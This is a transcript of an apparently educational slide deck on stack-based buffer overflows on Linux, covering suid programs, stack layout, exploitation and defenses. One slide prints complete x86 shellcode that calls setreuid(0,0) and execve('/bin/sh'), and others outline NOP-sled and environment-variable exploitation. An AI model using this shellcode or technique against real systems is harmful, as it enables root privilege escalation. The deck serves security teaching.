Buffer Overflows : An In-depth Analysis. Introduction Buffer overflows were understood as early as 1972 The legendary Morris Worm made use of a Buffer.

Slides:



Advertisements
Similar presentations
Buffer Overflows Nick Feamster CS 6262 Spring 2009 (credit to Vitaly S. from UT for slides)
Advertisements

Smashing the Stack for Fun and Profit
Defenses. Preventing hijacking attacks 1. Fix bugs: – Audit software Automated tools: Coverity, Prefast/Prefix. – Rewrite software in a type safe languange.
Computer Security: Principles and Practice EECS710: Information Security Professor Hossein Saiedian Fall 2014 Chapter 10: Buffer Overflow.
Computer Security: Principles and Practice First Edition by William Stallings and Lawrie Brown Lecture slides by Lawrie Brown Chapter 11 – Buffer Overflow.
Lecture 16 Buffer Overflow modified from slides of Lawrie Brown.
CMSC 414 Computer and Network Security Lecture 22 Jonathan Katz.
Breno de MedeirosFlorida State University Fall 2005 Buffer overflow and stack smashing attacks Principles of application software security.
Intro to Exploitation Stack Overflows James McFadyen UTD Computer Security Group 10/20/2011.
1 CHAPTER 8 BUFFER OVERFLOW. 2 Introduction One of the more advanced attack techniques is the buffer overflow attack Buffer Overflows occurs when software.
Stack-Based Buffer Overflows Attacker – Can take over a system remotely across a network. local malicious users – To elevate their privileges and gain.
Lecture 16 Buffer Overflow
CMSC 414 Computer and Network Security Lecture 20 Jonathan Katz.
University of Washington CSE 351 : The Hardware/Software Interface Section 5 Structs as parameters, buffer overflows, and lab 3.
Security Exploiting Overflows. Introduction r See the following link for more info: operating-systems-and-applications-in-
Introduction to InfoSec – Recitation 2 Nir Krakowski (nirkrako at post.tau.ac.il) Itamar Gilad (itamargi at post.tau.ac.il)
CAP6135: Malware and Software Vulnerability Analysis Buffer Overflow : Example of Using GDB to Check Stack Memory Cliff Zou Spring 2011.
Dr. José M. Reyes Álamo 1.  The 80x86 memory addressing modes provide flexible access to memory, allowing you to easily access ◦ Variables ◦ Arrays ◦
Exploiting Buffer Overflows on AIX/PowerPC HP-UX/PA-RISC Solaris/SPARC.
Let’s look at an example I want to write an application that reports the course scores to you. Requirements: –Every student can only get his/her score.
Introduction: Exploiting Linux. Basic Concepts Vulnerability A flaw in a system that allows an attacker to do something the designer did not intend,
Mitigation of Buffer Overflow Attacks
Brian E. Brzezicki. This tutorial just illustrates the underlying concepts of buffer overflows by way of an extremely simple stack overflow  Most buffer.
Lecture slides prepared for “Computer Security: Principles and Practice”, 3/e, by William Stallings and Lawrie Brown, Chapter 10 “Buffer Overflow”.
CNIT 127: Exploit Development Ch 4: Introduction to Format String Bugs.
Buffer Overflow CS461/ECE422 Spring Reading Material Based on Chapter 11 of the text.
Introduction to InfoSec – Recitation 2 Nir Krakowski (nirkrako at post.tau.ac.il) Itamar Gilad (itamargi at post.tau.ac.il)
Smashing the Stack Overview The Stack Region Buffer Overflow
CNIT 127: Exploit Development Ch 3: Shellcode. Topics Protection rings Syscalls Shellcode nasm Assembler ld GNU Linker objdump to see contents of object.
Buffer Overflow. Introduction On many C implementations, it is possible to corrupt the execution stack by writing past the end of an array. Known as smash.
Overflows & Exploits. In the beginning 11/02/1988 Robert Morris, Jr., a graduate student in Computer Science at Cornell, wrote an experimental, self-replicating,
Lecture 8: Buffer Overflow CS 436/636/736 Spring 2013 Nitesh Saxena *Adopted from a previous lecture by Aleph One (Smashing the Stack for Fun and Profit)
Buffer Overflow Proofing of Code Binaries By Ramya Reguramalingam Graduate Student, Computer Science Advisor: Dr. Gopal Gupta.
CNIT 127: Exploit Development Ch 1: Before you begin.
Stack-based buffer overflows Yves Younan DistriNet, Department of Computer Science Katholieke Universiteit Leuven Belgium
A Tool for Pro-active Defense Against the Buffer Overrun Attack D. Bruschi, E. Rosti, R. Banfi Presented By: Warshavsky Alex.
Buffer overflow and stack smashing attacks Principles of application software security.
Stack smashing.
Buffer Overflows Taught by Scott Coté.-. _ _.-. / \.-. ((___)).-. / \ /.ooM \ / \.-. [ x x ].-. / \ /.ooM \ -/ \ /-----\-----/---\--\ /--/---\-----/-----\ / \-
CS642: Computer Security X86 Review Process Layout, ISA, etc. Drew Davidson
Security Attacks Tanenbaum & Bo, Modern Operating Systems:4th ed., (c) 2013 Prentice-Hall, Inc. All rights reserved.
Slides by Kent Seamons and Tim van der Horst Last Updated: Nov 11, 2011.
Introduction to Assembly II Abed Asi Extended System Programming Laboratory (ESPL) CS BGU Fall 2014/2015.
Arrays. Outline 1.(Introduction) Arrays An array is a contiguous block of list of data in memory. Each element of the list must be the same type and use.
VM: Chapter 7 Buffer Overflows. csci5233 computer security & integrity (VM: Ch. 7) 2 Outline Impact of buffer overflows What is a buffer overflow? Types.
Analyzing C/C++ Vulnerabilities -- Mike Gerschefske.
ROP Exploit. ROP Return Oriented Programming (ROP): is a hacking exploit technique where you exploit buffer overflow to inject a chain of gadgets. Each.
CAP6135: Malware and Software Vulnerability Analysis Buffer Overflow : Example of Using GDB to Check Stack Memory Cliff Zou Spring 2014.
Chapter 10 Buffer Overflow 1. A very common attack mechanism o First used by the Morris Worm in 1988 Still of major concern o Legacy of buggy code in.
1 Introduction to Information Security , Spring 2016 Lecture 2: Control Hijacking (2/2) Avishai Wool.
@Yuan Xue Worm Attack Yuan Xue Fall 2012.
Exploiting & Defense Day 1 Recap
Let’s look at an example
Secure Programming Dr. X
Mitigation against Buffer Overflow Attacks
Buffer Overflow Buffer overflows are possible because C doesn’t check array boundaries Buffer overflows are dangerous because buffers for user input are.
CS 177 Computer Security Lecture 9
Secure Programming Dr. X
Exploiting & Defense Day 2 Recap
CMSC 414 Computer and Network Security Lecture 21
CS 465 Buffer Overflow Slides by Kent Seamons and Tim van der Horst
Software Security Lesson Introduction
CAP6135: Malware and Software Vulnerability Analysis Buffer Overflow : Example of Using GDB to Check Stack Memory Cliff Zou Spring 2015.
System Calls David Ferry CSCI 3500 – Operating Systems
Week 2: Buffer Overflow Part 1.
CAP6135: Malware and Software Vulnerability Analysis Buffer Overflow : Example of Using GDB to Check Stack Memory Cliff Zou Spring 2016.
Understanding and Preventing Buffer Overflow Attacks in Unix
CAP6135: Malware and Software Vulnerability Analysis Buffer Overflow : Example of Using GDB to Check Stack Memory Cliff Zou Spring 2013.
System and Cyber Security
Presentation transcript:

Buffer Overflows : An In-depth Analysis

Introduction Buffer overflows were understood as early as 1972 The legendary Morris Worm made use of a Buffer overflow exploit in fingerd in 1988 Programming languages commonly associated with buffer overflows include C and C++ A buffer overflow occurs when data written to a buffer, due to insufficient bounds checking, corrupts data values in memory addresses adjacent to the allocated buffer Most commonly this occurs when copying strings of characters from one buffer to another Result in erratic program behavior, including memory access errors, incorrect results, program termination, or a breach of system security. In 2003, buffer overflows present in licensed Xbox games have been exploited to allow unlicensed software

Buffer Overflows A A L L I I C C E E Name[9]Age[2] \0 Who the programmer was expecting… Name: Alice Age : 7

Buffer Overflows F F R R A A N N K K S S E E I I Name[9]Age[2] T T E E N N And who showed up uninvited… Name: Frankenstein Age : ? N

Introduction Exploitation The techniques to exploit a buffer overflow vulnerability vary per architecture, operating system and memory region Stack Based Buffer Overflows Heap Based Buffer Overflows Result in erratic program behavior, including memory access errors, incorrect results, program termination, or a breach of system security. duh! Now this is what I’m talking about !

Analysis of Stack Based Buffer Overflows on Linux Introduction Users, Groups and the Super User File Access Control and Permissions Suid Programs Memory Program Memory Segmentation Shellcode Program I Program II Defense

Fundamentals Users, Groups and the Super User User Hercules AthenaZeus Groups Group Gods Hercules OdysseusPerseus Group Mortals

Fundamentals Users, Groups and the Super User In Unix-style computer operating systems, root is the conventional name of the user who has all rights or permissions (to all files and programs) in all modes (single- or multi-user) The root user can do many things an ordinary user cannot, such as changing the ownership of files and binding to network ports numbered below The Root User

Fundamentals File Access Control and Permissions UserGroupOthers

Fundamentals File Access Control and Permissions Read Write Execute Read Write Read Write Dir Set G/Uid User Group Others Execute Set G/Uid Execute

Fundamentals File Access Control and Permissions

Fundamentals Suid Programs setuid and setgid are Unix access rights flags that allow users to run an executable with the permissions of the executable's owner or group. When a permission with suid permission is executed, the user’s effective user id (euid) is changed to the program’s owner Unix programs like mount, passwd etc. are all suid root

Fundamentals Suid Programs

Fundamentals Memory X86 processors use a 32-bit addressing scheme Variables are places in the memory that store information Pointers are special type of variables that store memory address locations to reference information Processor Memory ESP EBP EIP

Fundamentals Memory Little Endian and Big Endian 0x Little Endian Big Endian 0x x86, 6502, Z80, VAXMotorola 6800, 68000, System/370

BSS contains uninitialized global variables, strings and constants Both BSS and Data Segment are of fixed size BSS contains uninitialized global variables, strings and constants Both BSS and Data Segment are of fixed size Fundamentals Program Memory Segmentation Segment where assembled machine language instructions are located Also known as Code Segment No write permission to this segment Can be shared between different copies of Same Program Segment where assembled machine language instructions are located Also known as Code Segment No write permission to this segment Can be shared between different copies of Same Program Store global and static variables Data Segment contains initialized global variables, strings and constants Store global and static variables Data Segment contains initialized global variables, strings and constants Used for program variables Variable size and grows from Lower to Higher memory locations Used for program variables Variable size and grows from Lower to Higher memory locations FILO data structure used to store context during function calls Variable size and grows from Higher to Lower memory locations FILO data structure used to store context during function calls Variable size and grows from Higher to Lower memory locations

Fundamentals The Stack Processor EBP ESP Stack Frame

Fundamentals Stack Frame When a function is called, information is pushed to the stack and is known as a stack frame Return Address Function Parameter n Function Parameter n-1 EBP ESP frame pointer / local base pointer Saved Frame Pointer Function Variable 1 Function Variable 2 Function Variable 3 stack pointer Memory Stack Growth

Fundamentals Stack By Example return address stack frame pointer flag buffer void test_function(int a,int b, int c) { char flag; char buffer[10]; } void main() { testfunction(1,2,3) } Sample Program

Fundamentals Stack By Example - Demo

Fundamentals Stack By Example - Demo

Fundamentals Stack By Example

Fundamentals Stack By Example

Fundamentals Stack By Example

Fundamentals Stack By Example EBP return address

Fundamentals Shellcode section.data ; section declaration filepath db "/bin/shXAAAABBBB" ; the string section.text ; section declaration global _start ; Default entry point for ELF linking _start: ; setreuid(uid_t ruid, uid_t euid) mov eax, 70 ; put 70 into eax, since setreuid is syscall #70 mov ebx, 0 ; put 0 into ebx, to set real uid to root mov ecx, 0 ; put 0 into ecx, to set effective uid to root int 0x80 ; Call the kernel to make the system call happen ; execve(const char *filename, char *const argv [], char *const envp[]) mov eax, 0 ; put 0 into eax mov ebx, filepath ; put the address of the string into ebx mov [ebx+7], al ; put the 0 from eax where the X is in the string ; ( 7 bytes offset from the beginning) mov [ebx+8], ebx ; put the address of the string from ebx where the ; AAAA is in the string ( 8 bytes offset) mov [ebx+12], eax ; put the a NULL address (4 bytes of 0) where the ; BBBB is in the string ( 12 bytes offset) mov eax, 11 ; Now put 11 into eax, since execve is syscall #11 lea ecx, [ebx+8] ; Load the address of where the AAAA was in the ; string into ecx lea edx, [ebx+12] ; Load the address of where the BBBB is in the ; string into edx int 0x80 ; Call the kernel to make the system call happen section.data ; section declaration filepath db "/bin/shXAAAABBBB" ; the string section.text ; section declaration global _start ; Default entry point for ELF linking _start: ; setreuid(uid_t ruid, uid_t euid) mov eax, 70 ; put 70 into eax, since setreuid is syscall #70 mov ebx, 0 ; put 0 into ebx, to set real uid to root mov ecx, 0 ; put 0 into ecx, to set effective uid to root int 0x80 ; Call the kernel to make the system call happen ; execve(const char *filename, char *const argv [], char *const envp[]) mov eax, 0 ; put 0 into eax mov ebx, filepath ; put the address of the string into ebx mov [ebx+7], al ; put the 0 from eax where the X is in the string ; ( 7 bytes offset from the beginning) mov [ebx+8], ebx ; put the address of the string from ebx where the ; AAAA is in the string ( 8 bytes offset) mov [ebx+12], eax ; put the a NULL address (4 bytes of 0) where the ; BBBB is in the string ( 12 bytes offset) mov eax, 11 ; Now put 11 into eax, since execve is syscall #11 lea ecx, [ebx+8] ; Load the address of where the AAAA was in the ; string into ecx lea edx, [ebx+12] ; Load the address of where the BBBB is in the ; string into edx int 0x80 ; Call the kernel to make the system call happen

Smashing the Stack for fun and profit

1 2 3 return address stack frame pointer flag buffer void test_function(int a,int b, int c) { char flag; char buffer[100]; scanf(buffer); } void main() { testfunction(1,2,3) } evil buffer

Smashing the Stack for fun and profit return address stack frame pointer flag buffer return here Run evil code here

Smashing the Stack for fun and profit Attacker Code Return Address to Attacker Code Structure of the ‘perfect’ Evil Input return address stack frame pointer flag buffer

Smashing the Stack for fun and profit Attacker Code Repeated Return Addresses to Attacker Code Structure of the ‘real-world’ Evil Input NOP Sled return address stack frame pointer flag buffer

Smashing the Stack for fun and profit

1 2 3 return address stack frame pointer flag buffer void test_function(int a,int b, int c) { char flag; char buffer[5]; scanf(buffer); } void main() { testfunction(1,2,3) } Shellcode evil buffer What if the buffer was small ?

Smashing the Stack for fun and profit return address stack frame pointer flag buffer void test_function(int a,int b, int c) { char flag; char buffer[5]; scanf(buffer); } void main() { testfunction(1,2,3) } Repeated return address to the shellcode in the environment evil buffer Thou shall use the environment…. environment Shellcode

Smashing the Stack for fun and profit Dumping the shellcode in the environment…. int execle(const char *path, const char *arg,..., char * const envp[]); Finding the return address…. return address = 0xbffffffa – length of shellcode – length of program name OR gdb

Smashing the Stack for fun and profit

Defense Choice of programming language Use of safe libraries Buffer overflow protection Address space layout randomization The Java and.NET bytecode environments also require bounds checking on all arrays Nearly every interpreted language will protect against buffer overflows Performance Versus Safety Avoid standard library functions which are not bounds checked (strcpy,strcat,gets) Buffer overflow protection is used to detect the most common buffer overflows by checking that the stack has not been altered Three such systems are Libsafe, StackGuard and ProPolice gcc patches Microsoft's Data Execution Prevention mode explicitly protects the pointer to the SEH Exception Handler from being overwritten Address space layout randomization (ASLR) is a computer security feature which involves arranging the positions of key data areas, usually including the base of the executable and position of libraries, heap, and stack, randomly in a process' address space.

References “The Art of Exploitation” - Jon Erickson Wikipedia Amal Krishnan Digital Security Practice Cognizant FIN

Feedback: Privacy Policy Feedback
Do Not Sell My Personal Information
About project: SlidePlayer Terms of Service

© 2024 SlidePlayer.com Inc. All rights reserved.